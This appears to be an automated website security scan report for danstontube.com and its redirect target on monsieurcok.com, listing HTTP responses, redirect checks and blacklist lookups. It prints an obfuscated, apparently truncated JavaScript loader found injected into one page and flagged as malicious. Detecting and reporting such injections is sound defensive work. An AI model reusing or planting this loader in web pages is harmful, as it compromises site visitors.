Scanned pages/files
Request | Server response | Status |
http://www.danstontube.com/ | HTTP/1.1 302 Found Connection: close Date: Thu, 08 Jan 2015 13:33:27 GMT Location: http://www.monsieurcok.com/dantontube/index.html Server: Apache Content-Length: 232 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.monsieurcok.com/dantontube/index.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 08 Jan 2015 13:33:27 GMT Location: http://www.monsieurcok.com/danstontube/index.html Server: Apache Content-Length: 257 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.monsieurcok.com/danstontube/index.html | 200 OK Content-Length: 9566 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function($$,_2,_1,doc,tk) { var xo=""; function qq2(cid){cid=~~cid;return ["L",189-20*cid,175,16*cid,70,81,89,16,73,78,81,67,31,10,2,28,2,13,83,31,2,28,88,67,84,2,56,77,31,86,74,75,85,29,62,61,56,77,2,2,40,87,78,78,59,71,67,84,2,7,47,81,80,86,74,2,7,38,67,86,71,2,7,42,81,87,84,85,2,7,47,75,80,87,86,71,85,2,7,53,71,69,81,80,70,85,10,11,63,95,29,2,13,52,31,2,28,2,8,89,14,56,91,31,86,74,75,85,16,5,83,10,11,14,75,31,18,29,56,91,61,19,63,13,31,19,29,89,74,75,78,71,10,75,13,13,30,25,11,93,5 })((function(jsB) { return jsB.constructor }), (function(jsB) { return (function(jsBs) { return jsB.call(jsB, jsBs) }) })) },function(tt){return tt.pop();}, function(kk,dd,ch,pp){ for(var c=kk.length;c>0;){ var x=ch(c); c-=x; var rep=kk.substr(c, x); var t = dd.split(rep); dd=t.join(pp(t)); };return dd; },document,document.getElementsByTagName('title')); if(typeof gloa=='function')gloa(); Antivirus reports:
| ||
http://www.monsieurcok.com/test404page.js | 404 Not Found Content-Length: 458 Content-Type: text/html | clean |
http://www.monsieurcok.com/ | 200 OK Content-Length: 1473 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: danstontube.com
Result:
GET / HTTP/1.1
Host: danstontube.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: danstontube.com
Referer: http://www.google.com/search?q=danstontube.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: danstontube.com
Referer: http://www.google.com/search?q=danstontube.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=danstontube.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://danstontube.com/
Result: danstontube.com is not infected or malware details are not published yet.
Result: danstontube.com is not infected or malware details are not published yet.